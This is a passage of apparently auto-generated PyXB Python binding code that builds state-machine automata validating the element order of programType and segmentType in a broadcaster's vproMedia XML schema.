transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_22, False) ]))
st_24._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_23, True) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_23, False) ]))
st_25._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_24, True) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_24, False) ]))
st_26._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_25, True) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_25, False) ]))
st_27._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_26, True) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_26, False) ]))
st_28._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_27, True) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_27, False) ]))
st_29._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_28, True) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_28, False) ]))
st_30._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_29, True) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_29, False) ]))
st_31._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_30, True) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_30, False) ]))
st_32._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_31, True) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_31, False) ]))
st_33._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_32, True) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_32, False) ]))
st_34._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_33, True) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_33, False) ]))
st_35._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_34, True) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_34, False) ]))
st_36._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_35, True) ]))
st_37._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
programType._Automaton = _BuildAutomaton_28()
segmentType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), recursiveMemberRef, scope=segmentType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 633, 10)))
segmentType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'start'), pyxb.binding.datatypes.duration, scope=segmentType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 634, 10)))
def _BuildAutomaton_29 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_29
del _BuildAutomaton_29
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
counters.add(cc_15)
cc_16 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
counters.add(cc_16)
cc_17 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
counters.add(cc_17)
cc_18 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
counters.add(cc_18)
cc_19 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
counters.add(cc_19)
cc_20 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
counters.add(cc_20)
cc_21 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
counters.add(cc_21)
cc_22 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
counters.add(cc_22)
cc_23 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
counters.add(cc_23)
cc_24 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
counters.add(cc_24)
cc_25 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
counters.add(cc_25)
cc_26 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
counters.add(cc_26)
cc_27 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
counters.add(cc_27)
cc_28 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
counters.add(cc_28)
cc_29 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
counters.add(cc_29)
cc_30 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
counters.add(cc_30)
cc_31 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
counters.add(cc_31)
cc_32 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
counters.add(cc_32)
cc_33 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 633, 10))
counters.add(cc_33)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'crid')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'broadcaster')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'portal')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'exclusive')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'region')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'title')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'description')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'genre')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'tag')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'intentions')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'targetGroups')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'geoLocations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'topics')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'source')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'country')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'language')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isDubbed')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
st_18 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_18)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'releaseYear')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
st_19 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_19)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
st_20 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_20)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'credits')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
st_21 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_21)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'award')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
st_22 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_22)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'descendantOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
st_23 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_23)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
st_24 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_24)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ageRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
st_25 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_25)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'contentRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
st_26 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_26)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'email')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
st_27 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_27)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'website')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
st_28 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_28)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'twitter')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
st_29 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_29)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'teletext')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
st_30 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_30)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'prediction')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
st_31 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_31)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'locations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
st_32 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_32)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'relation')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
st_33 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_33)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'images')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
st_34 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_34)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'segmentOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 633, 10))
st_35 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_35)
final_update = set()
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'start')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 634, 10))
st_36 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_36)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
transitions.append(fac.Transition(st_7, [
]))
transitions.append(fac.Transition(st_8, [
]))
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
transitions.append(fac.Transition(st_11, [
]))
transitions.append(fac.Transition(st_12, [
]))
transitions.append(fac.Transition(st_13, [
]))
transitions.append(fac.Transition(st_14, [
]))
